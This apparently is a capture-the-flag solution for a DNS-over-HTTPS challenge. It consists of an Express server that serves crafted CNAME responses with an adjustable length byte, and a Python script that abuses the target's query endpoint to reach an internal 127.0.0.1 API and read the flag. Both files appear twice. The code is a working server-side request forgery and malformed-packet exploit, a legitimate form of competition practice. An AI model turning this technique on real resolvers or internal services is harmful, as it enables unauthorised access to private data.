st98/server.js

## server.js
const express = require('express');
const dnsPacket = require('dns-packet');
const app = express();
const port = 8000;

let len = 0x12;

app.get('/updateLength', (req, res) => {
  len = parseInt(req.query.len, 10);
  console.log('updated:', len);
  res.end('ok');
});

app.get('/', (req, res) => {
  res.end(dnsPacket.encode({
    type: 'response',
    answers: [
      {data: '\0\1\0\0\0\0\0\0' + String.fromCharCode(len), type: 'CNAME', name: 'NEKO'}
    ]
  }));
})

app.listen(8000, () => {
  console.log(`Example app listening at http://localhost:${port}`)
})

## solve.py
import json
import requests

#TARGET = 'http://192.168.99.101:3000'
TARGET = 'https://doh.cloud.flu.xxx'

i = 40

requests.get('http://(your IP address):8000/updateLength?len={}'.format(i))

req = requests.post(TARGET + '/query', data=json.dumps({
  'name': 'dns.google',
  'hostname': '(your IP address)',
  'port': 8000,
  'path': '/',
  'useHttps': False,
  'method': 'GET'
}), headers={
  'Content-Type': 'application/json'
})
print(req.text)

req = requests.post(TARGET + '/query', data=json.dumps({
  'name': 'dns.google',
  'hostname': '127.0.0.1',
  'port': 3080,
  'path': '/api?query=lastAnswer:dns.google&query=lastAnswer:flag&query=lastAnswer:dns.google&a=',
  'klass': 'IN',
  'type': 'A',
  'useHttps': False,
  'method': 'GET'
}), headers={
  'Content-Type': 'application/json'
})

print(hex(i), req.text)
	const express = require('express');
	const dnsPacket = require('dns-packet');
	const app = express();
	const port = 8000;

	let len = 0x12;

	app.get('/updateLength', (req, res) => {
	len = parseInt(req.query.len, 10);
	console.log('updated:', len);
	res.end('ok');
	});

	app.get('/', (req, res) => {
	res.end(dnsPacket.encode({
	type: 'response',
	answers: [
	{data: '\0\1\0\0\0\0\0\0' + String.fromCharCode(len), type: 'CNAME', name: 'NEKO'}
	]
	}));
	})

	app.listen(8000, () => {
	console.log(`Example app listening at http://localhost:${port}`)
	})
	import json
	import requests

	#TARGET = 'http://192.168.99.101:3000'
	TARGET = 'https://doh.cloud.flu.xxx'

	i = 40

	requests.get('http://(your IP address):8000/updateLength?len={}'.format(i))

	req = requests.post(TARGET + '/query', data=json.dumps({
	'name': 'dns.google',
	'hostname': '(your IP address)',
	'port': 8000,
	'path': '/',
	'useHttps': False,
	'method': 'GET'
	}), headers={
	'Content-Type': 'application/json'
	})
	print(req.text)

	req = requests.post(TARGET + '/query', data=json.dumps({
	'name': 'dns.google',
	'hostname': '127.0.0.1',
	'port': 3080,
	'path': '/api?query=lastAnswer:dns.google&query=lastAnswer:flag&query=lastAnswer:dns.google&a=',
	'klass': 'IN',
	'type': 'A',
	'useHttps': False,
	'method': 'GET'
	}), headers={
	'Content-Type': 'application/json'
	})

	print(hex(i), req.text)